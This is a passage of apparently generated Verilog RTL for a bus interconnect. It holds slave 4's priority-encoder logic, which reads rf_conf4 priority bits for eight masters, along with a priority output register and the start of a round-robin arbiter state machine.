            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[7] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[6] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[7] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[6] ) ) } == 2'h1 ) 
                begin
                    s4_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[7] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[6] ) ) } == 2'h2 ) 
                    begin
                        s4_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s4_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[3] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[7] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[6] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[3]) ) 
        begin
            s4_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[7] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[6] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s4_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[4] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[9] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[8] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[4]) ) 
        begin
            s4_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[9] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[8] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[9] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[8] ) ) } == 2'h1 ) 
                begin
                    s4_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[9] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[8] ) ) } == 2'h2 ) 
                    begin
                        s4_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s4_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[4] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[9] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[8] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[4]) ) 
        begin
            s4_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[9] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[8] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s4_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[5] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[11] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[10] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[5]) ) 
        begin
            s4_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[11] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[10] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[11] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[10] ) ) } == 2'h1 ) 
                begin
                    s4_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[11] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[10] ) ) } == 2'h2 ) 
                    begin
                        s4_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s4_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[5] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[11] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[10] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[5]) ) 
        begin
            s4_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[11] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[10] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s4_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[6] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[13] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[12] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[6]) ) 
        begin
            s4_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[13] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[12] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[13] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[12] ) ) } == 2'h1 ) 
                begin
                    s4_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[13] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[12] ) ) } == 2'h2 ) 
                    begin
                        s4_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s4_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[6] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[13] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[12] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[6]) ) 
        begin
            s4_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[13] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[12] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s4_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[7] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[15] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[14] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[7]) ) 
        begin
            s4_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[15] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[14] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[15] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[14] ) ) } == 2'h1 ) 
                begin
                    s4_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[15] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[14] ) ) } == 2'h2 ) 
                    begin
                        s4_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s4_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[7] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[15] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[14] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[7]) ) 
        begin
            s4_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[15] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[14] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s4_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s4_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s4_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd0_pri_out_d0 ) : ( s4_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s4_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd1_pri_out_d0 ) : ( s4_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd2_pri_out_d0 ) : ( s4_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd3_pri_out_d0 ) : ( s4_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd4_pri_out_d0 ) : ( s4_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd5_pri_out_d0 ) : ( s4_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd6_pri_out_d0 ) : ( s4_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd7_pri_out_d0 ) : ( s4_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s4_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd0_pri_out_d0 ) : ( s4_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s4_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd1_pri_out_d0 ) : ( s4_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd2_pri_out_d0 ) : ( s4_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd3_pri_out_d0 ) : ( s4_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd4_pri_out_d0 ) : ( s4_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd5_pri_out_d0 ) : ( s4_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd6_pri_out_d0 ) : ( s4_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd7_pri_out_d0 ) : ( s4_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s4_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s4_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s4_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s4_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s4_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s4_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s4_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s4_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd0_pri_out_d0 ) : ( s4_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s4_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd1_pri_out_d0 ) : ( s4_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd2_pri_out_d0 ) : ( s4_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd3_pri_out_d0 ) : ( s4_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd4_pri_out_d0 ) : ( s4_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd5_pri_out_d0 ) : ( s4_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd6_pri_out_d0 ) : ( s4_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s4_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s4_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s4_msel_pri_enc_pd7_pri_out_d0 ) : ( s4_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s4_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s4_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s4_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s4_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s4_next ) 
            begin
                s4_msel_pri_out <= ( ( ( s4_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s4_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s4_msel_pri_enc_pri_out0 ) : ( s4_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s4_msel_arb0_req = { ( s4_msel_req[7] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[15] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[14] ) ) } == 2'd0 ) ), ( s4_msel_req[6] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[13] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[12] ) ) } == 2'd0 ) ), ( s4_msel_req[5] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[11] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[10] ) ) } == 2'd0 ) ), ( s4_msel_req[4] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[9] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[8] ) ) } == 2'd0 ) ), ( s4_msel_req[3] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[7] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[6] ) ) } == 2'd0 ) ), ( s4_msel_req[2] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[5] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[4] ) ) } == 2'd0 ) ), ( s4_msel_req[1] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[3] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[2] ) ) } == 2'd0 ) ), ( s4_msel_req[0] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[1] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[0] ) ) } == 2'd0 ) ) };
    assign s4_msel_arb0_gnt = s4_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s4_msel_arb0_state <= s4_msel_arb0_grant0;
        end
        else
        begin 
            s4_msel_arb0_state <= s4_msel_arb0_next_state;
        end
    end
    always @ (  s4_msel_arb0_state or  { ( s4_msel_req[7] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[15] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[14] ) ) } == 2'd0 ) ), ( s4_msel_req[6] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[13] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[12] ) ) } == 2'd0 ) ), ( s4_msel_req[5] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[11] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[10] ) ) } == 2'd0 ) ), ( s4_msel_req[4] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[9] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[8] ) ) } == 2'd0 ) ), ( s4_msel_req[3] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[7] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[6] ) ) } == 2'd0 ) ), ( s4_msel_req[2] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[5] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[4] ) ) } == 2'd0 ) ), ( s4_msel_req[1] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[3] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[2] ) ) } == 2'd0 ) ), ( s4_msel_req[0] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[1] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s4_msel_arb0_next_state = s4_msel_arb0_state;
        case ( s4_msel_arb0_state ) 
        s4_msel_arb0_grant0:
        begin
            if (  !( s4_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s4_msel_arb0_req[1] ) 
                begin
                    s4_msel_arb0_next_state = s4_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s4_msel_arb0_req[2] ) 
                    begin
                        s4_msel_arb0_next_state = s4_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s4_msel_arb0_req[3] ) 
                        begin
                            s4_msel_arb0_next_state = s4_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s4_msel_arb0_req[4] ) 
                            begin
                                s4_msel_arb0_next_state = s4_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s4_msel_arb0_req[5] ) 
                                begin
                                    s4_msel_arb0_next_state = s4_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb0_req[6] ) 
                                    begin
                                        s4_msel_arb0_next_state = s4_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb0_req[7] ) 
                                        begin
                                            s4_msel_arb0_next_state = s4_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb0_grant1:
        begin
            if (  !( s4_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s4_msel_arb0_req[2] ) 
                begin
                    s4_msel_arb0_next_state = s4_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s4_msel_arb0_req[3] ) 
                    begin
                        s4_msel_arb0_next_state = s4_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s4_msel_arb0_req[4] ) 
                        begin
                            s4_msel_arb0_next_state = s4_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s4_msel_arb0_req[5] ) 
                            begin
                                s4_msel_arb0_next_state = s4_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s4_msel_arb0_req[6] ) 
                                begin
                                    s4_msel_arb0_next_state = s4_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb0_req[7] ) 
                                    begin
                                        s4_msel_arb0_next_state = s4_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb0_req[0] ) 
                                        begin
                                            s4_msel_arb0_next_state = s4_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb0_grant2:
        begin
            if (  !( s4_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s4_msel_arb0_req[3] ) 
                begin
                    s4_msel_arb0_next_state = s4_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s4_msel_arb0_req[4] ) 
                    begin
                        s4_msel_arb0_next_state = s4_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s4_msel_arb0_req[5] ) 
                        begin
                            s4_msel_arb0_next_state = s4_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s4_msel_arb0_req[6] ) 
                            begin
                                s4_msel_arb0_next_state = s4_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s4_msel_arb0_req[7] ) 
                                begin
                                    s4_msel_arb0_next_state = s4_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb0_req[0] ) 
                                    begin
                                        s4_msel_arb0_next_state = s4_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb0_req[1] ) 
                                        begin
                                            s4_msel_arb0_next_state = s4_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb0_grant3:
        begin
            if (  !( s4_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s4_msel_arb0_req[4] ) 
                begin
                    s4_msel_arb0_next_state = s4_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s4_msel_arb0_req[5] ) 
                    begin
